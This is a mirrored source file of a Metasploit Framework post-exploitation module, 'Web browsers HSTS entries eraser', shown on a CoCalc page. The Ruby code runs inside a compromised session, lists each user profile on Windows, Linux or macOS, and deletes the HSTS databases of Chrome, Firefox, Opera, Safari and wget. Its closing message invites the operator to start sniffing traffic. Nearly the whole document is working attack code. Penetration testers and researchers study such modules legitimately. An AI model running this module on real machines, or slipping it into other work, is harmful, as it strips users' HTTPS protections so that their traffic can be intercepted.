Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/manage/hsts_eraser.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::UserProfiles

9
  include Msf::Post::OSX::System

10
  include Msf::Post::Unix

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Web browsers HSTS entries eraser',

17
        'Description' => %q{

18
          This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,

19
          Google Chrome, Opera, Safari and wget.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [

23
          'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths

24
        ],

25
        'Platform' => %w[linux osx unix win],

26
        'Arch' => [ARCH_X86, ARCH_X64],

27
        'References' => [

28
          [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],

29
          [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]

30
        ],

31
        'SessionTypes' => %w[meterpreter shell],

32
        'Notes' => {

33
          'Stability' => [CRASH_SAFE],

34
          'SideEffects' => [CONFIG_CHANGES],

35
          'Reliability' => []

36
        }

37
      )

38
    )

39


40
    register_options([

41
      OptBool.new('DISCLAIMER',

42
                  [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])

43
    ])

44
  end

45


46
  def run

47
    unless (datastore['DISCLAIMER'] == true)

48
      print_error('This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.')

49
      return

50
    end

51


52
    profiles = user_profiles

53


54
    profiles.each do |user_profile|

55
      account = user_profile['UserName']

56
      browsers_hsts_db_path = {}

57


58
      case session.platform

59
      when 'windows'

60
        browsers_hsts_db_path = {

61
          'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",

62
          'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", # Just path for now

63
          'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"

64
        }

65
      when 'unix', 'linux'

66
        browsers_hsts_db_path = {

67
          'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",

68
          'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", # Just path for now

69
          'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",

70
          'wget' => "#{user_profile['LocalAppData']}/.wget-hsts"

71
        }

72
      when 'osx'

73
        browsers_hsts_db_path = {

74
          'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity",

75
          'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", # Just path for now

76
          'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity",

77
          'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist"

78
        }

79
      else

80
        print_error "Platform not recognized: #{session.platform}"

81
      end

82


83
      browsers_hsts_db_path.each_pair do |browser, path|

84
        if browser == 'Firefox'

85
          hsts_db_path = []

86
          if directory?(path)

87
            files = dir(path)

88
            files.reject! { |file| %w[. ..].include?(file) }

89
            files.each do |file_path|

90
              hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/)

91
            end

92
          end

93
          path = hsts_db_path[0]

94
        end

95
        if !path.nil? && file?(path)

96
          print_status "Removing #{browser} HSTS database for #{account}... "

97
          file_rm(path)

98
        end

99
      end

100
    end

101


102
    print_status 'HSTS databases removed! Now enjoy your favorite sniffer! ;-)'

103
  end

104


105
  def user_profiles

106
    user_profiles = []

107
    case session.platform

108
    when /unix|linux/

109
      user_names = dir('/home')

110
      user_names.reject! { |u| %w[. ..].include?(u) }

111
      user_names.each do |user_name|

112
        user_profiles.push('UserName' => user_name, 'LocalAppData' => "/home/#{user_name}")

113
      end

114
    when /osx/

115
      user_names = session.shell_command('ls /Users').split

116
      user_names.reject! { |u| u == 'Shared' }

117
      user_names.each do |user_name|

118
        user_profiles.push(

119
          'UserName' => user_name,

120
          'AppData' => "/Users/#{user_name}/Library",

121
          'LocalAppData' => "/Users/#{user_name}/Library/Application Support"

122
        )

123
      end

124
    when /windows/

125
      user_profiles |= grab_user_profiles

126
    else

127
      print_error 'Error getting user profile data!'

128
    end

129
    user_profiles

130
  end

131


132
  def system_separator

133
    return session.platform == 'windows' ? '\\' : '/'

134
  end

135
end

136


137